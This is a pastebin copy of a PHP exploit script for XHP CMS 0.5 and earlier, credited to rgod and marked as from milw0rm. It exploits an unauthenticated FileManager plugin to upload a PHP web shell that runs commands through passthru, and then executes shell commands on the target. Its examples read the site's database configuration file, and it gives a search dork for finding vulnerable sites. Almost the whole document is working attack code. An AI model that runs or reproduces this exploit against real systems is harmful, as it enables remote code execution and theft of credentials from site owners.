PHP 47
XHP-CMS_0.5.php Guest on 6th May 2020 01:29:42 PM
  1. #!/usr/bin/php -q -d short_open_tag=on
  2. <?
  3.  
  4. echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n";
  5. echo "by rgod [email protected]\r\n";
  6. echo "site: http://retrogod.altervista.org\r\n\r\n";
  7.  
  8. echo "dork: \"powered by XHP CMS\"\r\n\r\n";
  9.  
  10. if ($argc<4) {
  11. echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
  12. echo "host:      target server (ip/hostname)\r\n";
  13. echo "path:      path to XHP\r\n";
  14. echo "cmd:       a shell command\r\n";
  15. echo "Options:\r\n";
  16. echo "   -p[port]:    specify a port other than 80\r\n";
  17. echo "   -P[ip:port]: specify a proxy\r\n";
  18. echo "Examples:\r\n";
  19. echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n";
  20. echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n";
  21. echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
  22. }
  23.  
  24. /* explaination:
  25.  without to have admin rights, you can have access to FileManager plugin
  26.  to upload php files:
  27.  
  28.  http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php
  29.  
  30.  or
  31.  
  32.  http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php
  33.  
  34.  after, you can launch commands from them, ex:
  35.  
  36.  http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php
  37.  
  38.                                                                               */
  39. ini_set("max_execution_time",0);
  40. ini_set("default_socket_timeout",5);
  41.  
  42. function quick_dump($string)
  43. {
  44.   $result='';$exa='';$cont=0;
  45.   for ($i=0; $i<=strlen($string)-1; $i++)
  46.   {
  47.    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  48.    {$result.="  .";}
  49.    else
  50.    {$result.="  ".$string[$i];}
  51.    if (strlen(dechex(ord($string[$i])))==2)
  52.    {$exa.=" ".dechex(ord($string[$i]));}
  53.    else
  54.    {$exa.=" 0".dechex(ord($string[$i]));}
  55.    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  56.   }
  57.  return $exa."\r\n".$result;
  58. }
  59. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
  60. function sendpacketii($packet)
  61. {
  62.   global $proxy, $host, $port, $html, $proxy_regex;
  63.   if ($proxy=='') {
  64.     $ock=fsockopen(gethostbyname($host),$port);
  65.     if (!$ock) {
  66.       echo 'No response from '.$host.':'.$port; die;
  67.     }
  68.   }
  69.   else {
  70.         $c = preg_match($proxy_regex,$proxy);
  71.     if (!$c) {
  72.       echo 'Not a valid proxy...';die;
  73.     }
  74.     $parts=explode(':',$proxy);
  75.     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  76.     $ock=fsockopen($parts[0],$parts[1]);
  77.     if (!$ock) {
  78.       echo 'No response from proxy...';die;
  79.         }
  80.   }
  81.   fputs($ock,$packet);
  82.   if ($proxy=='') {
  83.     $html='';
  84.     while (!feof($ock)) {
  85.       $html.=fgets($ock);
  86.     }
  87.   }
  88.   else {
  89.     $html='';
  90.     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  91.       $html.=fread($ock,1);
  92.     }
  93.   }
  94.   fclose($ock);
  95.   #debug
  96.  #echo "\r\n".$html;
  97. }
  98.  
  99. function make_seed()
  100. {
  101.    list($usec, $sec) = explode(' ', microtime());
  102.    return (float) $sec + ((float) $usec * 100000);
  103. }
  104.  
  105. $host=$argv[1];
  106. $path=$argv[2];
  107. $action=$argv[3];
  108. $cmd="";$port=80;$proxy="";
  109.  
  110. for ($i=3; $i<=$argc-1; $i++){
  111. $temp=$argv[$i][0].$argv[$i][1];
  112. if (($temp<>"-p") and ($temp<>"-P"))
  113. {$cmd.=" ".$argv[$i];}
  114. if ($temp=="-p")
  115. {
  116.   $port=str_replace("-p","",$argv[$i]);
  117. }
  118. if ($temp=="-P")
  119. {
  120.   $proxy=str_replace("-P","",$argv[$i]);
  121. }
  122. }
  123. $cmd=urlencode($cmd);
  124.  
  125. if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
  126. if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  127.  
  128.  
  129. srand(make_seed());
  130. $anumber = rand(1,99999);
  131.  
  132.    echo "[1] Uploading a shell...\r\n";
  133. $data='-----------------------------7d61592213049c
  134. Content-Disposition: form-data; name="dir"
  135.  
  136. /
  137. -----------------------------7d61592213049c
  138. Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php"
  139. Content-Type: text/plain
  140.  
  141. <?php
  142. if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
  143. ini_set("max_execution_time",0);
  144. echo "*delim*";
  145. passthru($_GET[cmd]);
  146. echo "*delim*";
  147. ?>
  148. -----------------------------7d61592213049c
  149. Content-Disposition: form-data; name="submit"
  150.  
  151. Upload
  152. -----------------------------7d61592213049c--
  153. ';
  154.   $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n";
  155.   $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
  156.   $packet.="Host: ".$host."\r\n";
  157.   $packet.="Content-Length: ".strlen($data)."\r\n";
  158.   $packet.="Connection: close\r\n\r\n";
  159.   $packet.=$data;
  160.   #echo quick_dump($packet);
  161.  sendpacketii($packet);
  162.   sleep(1);
  163.   echo "[2] Launch commands...\r\n";
  164.   $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
  165.   $packet.="Host: ".$host."\r\n";
  166.   $packet.="Connection: Close\r\n\r\n";
  167.   #echo quick_dump($packet);
  168.  sendpacketii($packet);
  169.   if (strstr($html,"*delim*"))
  170.   {
  171.   echo "Exploit succeeded...\r\n\r\n";
  172.   $temp=explode("*delim*",$html);
  173.   echo $temp[1];
  174.   }
  175.   else
  176.   {echo "Exploit failed...\r\n";}
  177. ?>
  178.  
  179. # milw0rm.com

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.